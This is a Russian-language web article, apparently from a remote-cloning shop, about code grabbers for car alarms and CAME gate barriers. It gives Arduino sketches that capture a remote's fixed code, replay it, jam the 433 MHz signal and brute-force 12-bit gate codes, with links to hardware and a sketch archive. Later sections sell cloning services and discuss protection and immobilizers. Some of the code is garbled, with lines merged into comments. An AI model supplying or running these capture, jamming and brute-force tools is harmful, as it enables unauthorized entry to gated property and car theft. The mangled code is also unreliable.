Кодграббер: что это, виды, способы защиты

Виды кодграбберов

Грабберы для машин бывают 3 видов:

  • Кодграбберы сканеры сигнализаций. Такие модификации считывающих устройств стоят недорого. Они могут ловить только статический код (код, которые не меняется).
  • Auto grabber, который использует код-подмену. Такой граббер имеет спец генератор помех, способный глушить код. Принцип действия его основан на том, что в момент, когда владелец авто вышел из машины, хочет поставить авто на охрану, нажимает кнопку на родном брелке сигнализации, граббер глушит его код и подменяет этот код своим.
  • Кодграббер алгоритмический. Это воровское устройство может открывать более дорогие сигнализации, которые основаны на работе диалоговой схемы.

В этой статье разберем:

1. Как считать код пульта. 2. Как послать код с arduino на открытие шлагбаума 3. Как заглушить сигнал 4. Как перебором подобрать код для открытия шлагбаумаю

Ссылка на приемник и передатчик: http://ali.ski/S699Bv Ссылка на пульт came: http://ali.ski/-jEW2

1. скетч на считывание кода с пульта:

#define RX 2 
#define TIMER_DIV 
volatile byte level=255; 
volatile unsigned long last, len; 
byte p_level; 
unsigned long p_len, p_len_prev; 
struct  
{  
  uint8_t state;  
  uint8_t data, dat_bit;  
} came;  
void set_bit(uint8_t *data, uint8_t n) 
{ 
  data[n/8]|=1<<(n%8); } #define CM_MAX_TE 450 #define CM_MIN_TE 250 #define CM_BITS12 12 #define CM_BITS24 24 void process_came() { unsigned char b; switch(came.state) { case 0: if(p_level) break; came.state=1; break; case 1: //start if(!p_level) break; else if(p_len>=CM_MIN_TE && p_len<=CM_MAX_TE)  
      {  
        came.state=2;  
        came.dat_bit=0;  
        came.data=0x00;  
        came.data=0x00;  
        came.data=0x00;  
         
      }  
      else came.state=0;  
         
      
    
    case 2: //dat  
      if(p_level)  
      {  
        if(came.dat_bit==CM_BITS24)  
        {  
          came.state=0;  
          break;  
        }  

        if(p_len_prev<=CM_MAX_TE && p_len_prev>=CM_MIN_TE &&  
           p_len<=CM_MAX_TE*2 && p_len>=CM_MIN_TE*2) b=0;  
         else  
        if(p_len_prev<=CM_MAX_TE*2 && p_len_prev>=CM_MIN_TE*2 &&  
           p_len<=CM_MAX_TE && p_len>=CM_MIN_TE) b=1;  
         else  
        {  
          came.state=0;  
          break;  
        }  

        if(b) set_bit(came.data, came.dat_bit);  
        came.dat_bit++;  
        break;  
      }  
       else  
      {  
        if((p_len>5000)&&(came.dat_bit==CM_BITS12 || came.dat_bit==CM_BITS24)) came.state=100;  
      }  
      break;  
  }  
}   
void dump_hex(byte *buf, byte bits) 
{ 
byte b; 

for(b=0; b>(bits+7)/8; b++) 
{ 
if(buf>0x0f) Serial.print('0'); 
Serial.print(buf, HEX); 
Serial.print(" "); 
} 
Serial.println(""); 
} 
void rx_int() 
{ 
if(level!=255) return; 

len=micros()-last; 
last=micros(); 

if(digitalRead(RX)==HIGH) level=0; 
else level=1;  
} 
void setup() 
{  
attachInterrupt(0, rx_int, CHANGE); 

Serial.begin(115200);  
while(!Serial); 

Serial.println("MEGA ARDUINO LOGGER"); 
Serial.println(""); 

interrupts(); 
}  

byte b; 

void loop() 
{  
if(level!=255) 
{ 
noInterrupts(); 
p_level=level; 
p_len=len; 
len=0; 
level=255; 
interrupts(); 

process_came(); 

p_len_prev = p_len; 
} 


if(came.state==100) 
{ 
Serial.print(came.data,HEX); 
Serial.print(came.data,HEX); 
Serial.print(came.data,HEX); 
//Serial.print("CAME: "); 
dump_hex(came.data, came.dat_bit); 
came.state=0; 
} 
}  
2.Посылаем код с помощью передатчика:
#define txPin 8
#define Te 320

void setup(){
  pinMode(txPin, OUTPUT);
}

void loop()
{
  SendCame(0b111111111111);
}

void SendCameBit(byte b)
{
  delayMicroseconds(Te);
  if (!b) digitalWrite(txPin,HIGH);
  delayMicroseconds(Te);
  digitalWrite(txPin,HIGH);
  delayMicroseconds(Te);
  digitalWrite(txPin,LOW);
}

void SendCame(long Code)
{     
  for (int j=0;j<5;j++) // посылку посылаем как и брелок - 4 раза подряд. { digitalWrite(txPin,HIGH); delayMicroseconds(Te); digitalWrite(txPin,LOW);// посылаем стартовый импульс for (byte i=12;i>0;i--){
      SendCameBit(bitRead(Code, i-1)); // побитово перебираем и посылаем код
    }
    delay(16);
  }
  delay(2000); // сделать паузу после посылки на 2 с
}
3. Делаем глушилку сигнала:
void setup() { 
pinMode(8, OUTPUT); 
}

void loop() {
digitalWrite(8, HIGH);
delayMicroseconds(500);
digitalWrite(8, LOW);
delayMicroseconds(500);
}
4. Делаем перебор кодов пульта от шлагбаумов Came:
#define txPin 8
#define Te 320
int led = B00000001;
int led2 = B1000;
void setup(){
  pinMode(txPin, OUTPUT);
}
 
void loop()
{
 // SendCame(0b100010001111);
 // delay(2000);
  // SendCame((B1110 * 256) + B10101010);
 //  delay(5000);
  SendCame((led2 * 256) + led);
  led = led + B1;
 // delay(1000);
 
  if (led==11111111)
    {led2 = led2 + B1; }
}
 
void SendCameBit(byte b)
{
  delayMicroseconds(Te);
  if (!b) digitalWrite(txPin,HIGH);
  delayMicroseconds(Te);
  digitalWrite(txPin,HIGH);
  delayMicroseconds(Te);
  digitalWrite(txPin,LOW);
}
 
void SendCame(long Code)
{    
  for (int j=0;j<5;j++) // посылку посылаем как и брелок - 4 раза подряд.
  {
    digitalWrite(txPin,HIGH);
    delayMicroseconds(Te);
    digitalWrite(txPin,LOW);// посылаем стартовый импульс
   
    for (byte i=12;i>0;i--){
      SendCameBit(bitRead(Code, i-1)); // побитово перебираем и посылаем код
    }
    delay(16);
  }
  delay(500); // сделать паузу после посылки на 2 с
}

Ссылка на архив со скетчами:  https://yadi.sk/d/vywdKVjN39qYt5


Пульт и брелки для шлагбаума

 Купить пульт от гаражных ворот или для шлагбаума в компании «Автомобильные ключи СПб» можно по ценам официального дистрибьютора у нас в магазине или с доставкой. У нас есть услуга выезда мастера для изготовления и программирование пультов и брелков для автоматических ворот, шлагбаумов, рольставен, жалюзей, откатных ворот. Копии пультов от ворот и дубликаты изготавливаются в течении 10 минут.

Брелок для шлагбаума-основные виды:  Стандартно брелоки работают в частотном диапазоне 433МГц, что делает возможным управление шлагбаума в радиусе 100 м. от самой конструкции. У брелоков для шлагбаумов есть своя особенность: на радиус действия работы влияет радиочастотная обстановка конкретной территории, то есть при наличии помех, брелок сможет подавать сигналы с меньшего расстояния. Однако, это свойство нисколько не уменьшает популярность радиобрелоков, так как многие находят их очень удобным устройством.

Программирование пультов для ворот

Стоимость услуг на выезде: 

В указанные цены входит программирование любого количества пультов. Звоните, и мы подскажем как склонировать ключ от ворот.

                   Доставка без программирования      от 300 рублей
      Доставка с программированием с пульта на пульт       1000 рублей
 Доставка с программированием через радиоканал автоматики (требуется доступ в блок управления воротами или шлагбаумом)       1500 рублей
 Установка или замена автоматики (радиоканала блока управления воротами,  шлагбаумом, ральставнями от 3000 рублей (стоимость работыбез оборудования)

 

 Различают два вида брелоков для ворот шлагбаумов:   Брелок с фиксированным кодом: такой тип запрограммирован на подачу одного определенного кода. Это делает такой вид радиопульта довольно уязвимым к перехвату сигнала. Такую копию брелка для шлагбаума можно изготовить за 10 минут. Брелок с «динамичным» кодом: данный тип радиобрелока отличается высокой надежностью, так как постоянно меняющийся код доступа. Количество комбинаций может достигать 18 млн. кодов, что делает перехват сигнала практически бессмысленным. «Динамичный» брелок для шлагбаумов обеспечит высокий уровень защиты территории от вторжения посторонних лиц. Сделать дубликат такого брелка от ворот труднее и по времени может быть до 30 минут.

Доставка пультов по Санкт-Петербургу, Москве и России

Для постоянных клиентов действуют скидки и акции  Пульты от ворот, видео инструкция как сделать копию или дубликат второго брелка на универсальный

Методы защиты

Для предотвращения взлома механизма с помощью сканера или граббера, а также его открытия без пульта необходимо:

  • перед покупкой и установкой системы осведомиться о фирмах-производителях;
  • почитать отзывы о производимых устройствах;
  • изучить функционал автоматизированных комплексов;
  • изучить степени защиты;
  • сопоставить необходимые и предоставляемые меры защиты.

Более дорогие устройства, как правило, оснащены дополнительной системой защиты от взлома. Они блокируют любые попытки копирования радиосигнала посторонними устройствами. Например, те брелоки, которые используют в своей работе динамический код с 16 и более миллионами вариантов.

Системы защиты:

  1. Простая система радиоуправления (РУ). Имеет статический код, который одинаков на всех брелоках. Прием сигнала нигде и никогда не фиксируется, а число возможных брелоков не ограничено.
  2. Сложная система с роллинг-кодом (динамическим кодом). Прием сигнала не фиксируется, но есть фиксированное число брелоков в системе (от 5 до 400 в разных моделях).
  3. Сложная компьютерная система.

Прием сигнала фиксируется в памяти компьютера. У каждого брелока свой порядковый номер и уникальный файл. Это позволяет, в случае потери брелока или временного ограничения на въезд (например, из-за неуплаты членских взносов), заблокировать возможность открытия шлагбаума конкретным брелоком (пультом).

Преимущества динамического кода:

  • незначительное влияние на ценовую границу (цена ненамного выше, чем у системы РУ со статическим кодом);
  • подобрать такой код практически невозможно, поскольку он постоянно изменяется;
  • возможна регулировка частоты генерируемых сигналов.

Описание пульта для ворот и шлагбаумов SK-4D

Пульт SK-4D предназначен для радиоуправления воротами, шлагбаумами и другими радиоуправляемыми устройствами как с фиксированным кодом так и с динамическим кодом (Doorhan) с рабочей частотой 433,92 МГц. SK-4D предназначен прежде всего для создания дублей с оригинальных пультов.

Пульт обладает возможностью хранить до 4 разных сигналов с разных пультов от разных производителей.

Программирование пульта SK-4D:

1

Копирование пультов с фиксированным кодомВнимание! Для защиты от случайного программирования, время между операциями должно занимать не более 10 секунд, иначе пульт выйдет из режима программирования, с сохранением ранее записанного кода.1.1. Нажмите одновременно и удерживайте кнопки 2 и 4 на пульте SK-4D, пока не начнѐт медленно мигать индикатор — один раз в секунду (удерживать необходимо около 2 сек., во время удержания индикатор не должен светиться, если индикатор светится, значит, кнопки были нажаты не синхронно – повторите нажатие на кнопки синхронно).1.2

Нажмите на 1 сек. кнопку на пульте SK-4D, на которую вы хотите скопировать сигнал, индикатор должен мигать быстро (пять раз в секунду).1.3.а Поднесите оригинальный пульт сверху, в плотную, к правой части пульта SK-4D (как на рисунке), Нажмите нужную кнопку на оригинальном пульте и удерживайте, индикатор на пульте SK-4D будет светиться постоянно – запись сигнала началась. Удерживайте кнопку на оригинальном пульте, пока индикатор на пульте SK-4D не погаснет.1.4.Сигнал записан, пульт готов к работе. Записанный сигнал хранится в энергонезависимой памяти пульта не менее 10 лет (не стирается при смене батареи). Кнопки программируются не зависимо друг от друга. Число перепрограммирований – не ограничено

2. Копирование пультов AN Motors, Roger, DEAКопирование осуществляется по той же методике как в пункте 1 — Копирование пультов с фиксированным кодом за исключением пункта 1.3.а. Копировать следует по методике п. 1.3.б.1.3.б Поднесите оригинальный пульт сверху, в плотную, к правой части пульта SK-4D (как на рисунке), Нажмите любую не действующую кнопку на оригинальном пульте, примерно на пол секунды, выдержите паузу около пол секунды (0,2… 0,5 сек.) затем нажмите действующую кнопку на оригинальном пульте и удерживайте до тех пор, пока индикатор на пульте SK-4D не погаснет. (При управлении, кнопку на SK-4D нужно будет удерживать около 2-х секунд).3

Копирование пультов Дорхан3.1 Копирование Дорхан — способ 1. Внимание! Скопированные способом 1 пульты SK-4D будут работать в основном только с автоматикой Дорхан, произведенной до 2013 года

1. Нажмите одновременно и удерживайте кнопки 2 и 3 на пульте SK-4D, пока не начнѐт медленно мигать индикатор — один раз в секунду (удерживать необходимо около 1 сек., во время удержания индикатор не должен светиться, если индикатор светится, значит, кнопки были нажаты не синхронно – повторите нажатие на кнопки синхронно).2. Нажмите кнопку на пульте SK-4D, на которую вы хотите записать сигнал (примерно на 1 секунду), индикатор должен мигать быстро (пять раз в секунду).3. Поднесите оригинальный пульт вплотную, сверху, к правой части пульта SK-4D (как на рисунке), Нажмите нужную кнопку на оригинальном пульте и удерживайте, индикатор на пульте SK-4D будет светиться постоянно – запись сигнала началась. Удерживайте кнопку на оригинальном пульте, пока индикатор на пульте SK-4D не погаснет. Сигнал записан, пульт готов к работе. Записанный сигнал хранится в энергонезависимой памяти пульта не менее 10 лет (не стирается при смене батареи).Для того чтобы записать сигнал на другие кнопки, проделайте пункты 1…3 только для других кнопок

Число перепрограммирований – не ограничено.Внимание! При управлении, созданной способом 1 копией, будет задержка, около 1 секунды

Иммобилайзер — защита от угона

С англ. переводится как обездвиживатель. Immobilizer — вид электронного средства от угона. Он блокирует какую-то деталь или узел конструкции автомобиля, например, препятствует передачи электроэнергии на обычный или редукторный стартер или бензонасос, или зажигание. Иммобилайзер размыкает какую-либо цепь ответственно важных устройств для запуска и движения автомобиля. Блокировка или разблокировка осуществляется специальным ключом или брелком.

Существуют иммобилайзеры, которые дают возможность завести автомобиль, а после они блокируют какое-либо устройство и включают звуковой сигнал. Звук включается, чтобы у угонщика не было времени отключить иммо.

Кому нужны кодграбберы для авто:

  1. Авто угонщики.
  2. Воры автомагнитол, видео регистраторов, и других вещей, находящихся внутри машины. После кражи салонных вещей, авто закрывают. Поэтому не рекомендуется оставлять в авто документы, телефоны, деньги. Когда оставляете машину в сервисе для ремонта, брелок от сигнализации надо забирать с собой и перевести охранную систему в сервисный режим. Это не позволит недобросовестным слесарям, механикам и других работников СТО привязать дополнительно еще брелок к сигнализации. И надо следить, сколько брелков привязано к сигнализации вашего авто.

Кому нужны кодграбберы для шлагбаумов:


Такой считыватель кодов можно купить на алиэкспресс примерно за 6 долларов. Этот кодграббер подходит для шлагбаумов Nice, Game.

А этот код граббер подходит для разных шлагбаумов. Универсальный брелок V2.0. Имеет цветной дисплей и может сохранять 20 кодов. Пульт может открывать и закрывать шлагбаумы следующих производителей: CAME Top, DORHAN, DEA, BENINCA, CAME Tam, NICE Flo, Nice Flo-s, FAAC, GSN ACS-R, NICE. Цена: 14500 р.

Видео

В этом видео показывается как работать с кодграббером сигнализаций.

В этом видео в кадр попал вор, который использовал кодграббер.

Полезные советы: как защитить от кодграббера.

Если вместо ворот стоит шлагбаум, как его открыть?


Code Grabber Pandora (Пандора) для шлагбаумов и ворот.

https://youtube.com/watch?v=vjX3PRHebj8

Некоторые предпочитают делать кодграбберы своими руками.

Code Grabber — что это?

Кодграббер для авто применяется для обмана электронной системы защиты от угона транспортного средства. Такие средства придуманы изначально с хорошей целью — получать доступ к автомобилю сотрудникам сервисных служб в случае поломок и отказа сигнализации подчиняться командам брелка. Затем их начали приобретать угонщики самих машин или просто для открытия авто и кражи различных вещей, находящихся в салоне.

На крупных стоянках стоят люди с устройствами кодграбберами и ждут, когда владелец автомобиля нажмет на кнопку постановки сигнализации. Они также активируют граббер в момент активации автомобильной сигнализации и электронное устройство «вор кода» запоминает посылаемый брелком код, которым можно воспользоваться потом для вскрытия авто.

Почти все виды автомобильных сигнализаций не могут защититься от считывания кода посторонним устройством. Возможно, самые дорогие марки и модели сигналок имеют специальное шифрование, которое способно маскировать свои передаваемые и получаемые сигналы.

Так как радиус действия кодграббера 150 метров, то поймать человека с граббером трудно, тем более в центре густонаселенного города.


С этим читают